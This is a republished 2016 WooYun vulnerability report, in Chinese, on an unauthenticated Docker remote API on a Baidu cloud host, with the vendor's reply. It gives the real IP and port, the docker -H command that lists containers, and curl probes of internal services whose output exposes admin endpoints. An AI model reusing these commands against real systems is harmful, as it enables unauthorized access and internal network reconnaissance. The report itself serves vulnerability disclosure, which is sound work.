新姿势之获取百度机器root权限

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-05-17: 细节已通知厂商并且等待厂商处理中
2016-05-17: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-05-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

请允许我再刷一个~
什么时候有first blood效果
预告!drops分析文章即将发布

详细说明:

docker remote api未授权访问

code 区域
http://180.76.161.55:2375



查看运行的容器

code 区域
docker -H tcp://180.76.161.55:2375 ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
d294b4eed64f registry.bae.bj.baidubce.com/public/ubuntu12.04_web_php5.5:6653-91 "/usr/bin/tini -- /us" 7 weeks ago Up 7 weeks 0.0.0.0:8888->8080/tcp grave_williams
e6ba8c1ca7e8 swarm "/swarm join --advert" 7 weeks ago Up 7 weeks 2375/tcp sick_lichterman



域名证明为百度

code 区域
registry.bae.bj.baidubce.com



拿root权限,过程请参考之后发布的drops文章

ifconfig

code 区域
[email protected]:~# ifconfig
docker0 Link encap:Ethernet HWaddr 02:42:df:68:95:78
inet addr:172.17.0.1 Bcast:0.0.0.0 Mask:255.255.0.0
inet6 addr: fe80::42:dfff:fe68:9578/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:933462 errors:0 dropped:0 overruns:0 frame:0
TX packets:889024 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:77456385 (77.4 MB) TX bytes:119620987 (119.6 MB)

eth0 Link encap:Ethernet HWaddr fa:16:3e:75:d9:b9
inet addr:192.168.2.189 Bcast:192.168.255.255 Mask:255.255.0.0
inet6 addr: fe80::f816:3eff:fe75:d9b9/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1400 Metric:1
RX packets:13544982 errors:0 dropped:0 overruns:0 frame:0
TX packets:11278565 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2681279156 (2.6 GB) TX bytes:2649540661 (2.6 GB)



registry.bae.bj.baidubce.com内网ip 10.16.83.153

code 区域
[email protected]:~# ping registry.bae.bj.baidubce.com
PING registry.bae.bj.baidubce.com (10.16.83.153) 56(84) bytes of data.
64 bytes from 10.16.83.153: icmp_req=1 ttl=61 time=0.300 ms
64 bytes from 10.16.83.153: icmp_req=2 ttl=61 time=0.314 ms
64 bytes from 10.16.83.153: icmp_req=3 ttl=61 time=0.274 ms



经过测试发现与

WooYun: 一不小心走进了百度内网

漏洞在同一网段

code 区域
[email protected]:~# curl 10.16.83.164:8080
__ _ __
/ /_ ____ _(_)___/ /_ __ _________ _____
/ __ \/ __ `/ / __ / / / /_____/ ___/ __ \/ ___/
/ /_/ / /_/ / / /_/ / /_/ /_____/ / / /_/ / /__
/_.___/\__,_/_/\__,_/\__,_/ /_/ / .___/\___/
/_/
User Manual : http://wiki.baidu.com/display/RPC

/status : Status of services
/connections : List all connections
/flags : List all gflags
/flags/port : List the gflag
/flags/guard_page_size;help* : List multiple gflags with glob patterns (Use $ instead of ? to match single character)
/flags/NAME?setvalue=VALUE : Change a gflag, validator will be called. User is responsible for thread-safety and consistency issues.
/vars : List all exposed bvars
/vars/rpc_num_sockets : List the bvar
/vars/rpc_server*_count;iobuf_blo$k_* : List multiple bvars with glob patterns (Use $ instead of ? to match single character)
/rpcz : Recent RPC calls(disabled)
/rpcz/stats : Statistics of rpcz
/rpcz?time=2016/05/17-00:05:28 : RPC calls before the time
/rpcz?time=2016/05/17-00:05:28&max_scan=10 : N RPC calls at most before the time
Other filters: min_latency, min_request_size, min_response_size, log_id, error_code
/rpcz?trace=N : Recent RPC calls whose trace_id is N
/rpcz?trace=N&span=M : Recent RPC calls whose trace_id is N and span_id is M
/hotspots/cpu : Profiling CPU (disabled)
/hotspots/heap : Profiling heap (disabled)
/hotspots/growth : Profiling growth of heap (disabled)
curl -H 'Content-Type: application/json' -d 'JSON' 10.63.28.21:8002/ServiceName/MethodName : Call method by http+json
/version : Version of this server, set by Server::set_version()
/health : Test healthy
/vlog : List all VLOG callsites
/sockets : Check status of a Socket
/bthreads : Check status of a bthread
/ids : Check status of a bthread_id
/protobufs : List all protobuf services and messages
/list : json signature of methods
/threads : Check pstack (disabled)
/dir : Browse directories and files (disabled)





code 区域
[email protected]:~# curl 10.16.83.151
[cf971f2d3a042b53308e9696d4923bdb] Not allowed to access builtin services, try ServerOptions.internal_port=8222 instead if you're inside Baidu's network





已证明,不再深入

漏洞证明:

 

修复方案:

 

版权声明:转载请注明来源 黑客,绝对是黑客@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-17 11:41

厂商回复:

赞这个提交!很cool,但是,但是,经过我们排查,这个漏洞非百度及开放云漏洞。我们开放云的客户在虚机上使用了BAE公共docker镜像搭建了docker服务来测试,并且开启了remote api,却没有认证!客户说,这个只是他的测试帐号,明天将会重装,允许我们提前忽略来配合drops文章的发布,非常期待!

最新状态:

2016-05-17:至于10.16.83.X,该段设计之初就是暴露给北京region的云上租户虚机,提供的都是公共服务。如果发现公共服务存在漏洞,欢迎通过BSRC或者WooYun报告给我们。


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:新姿势之获取百度机器root权限 - https://www.15qq.cn/wooyun/396.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知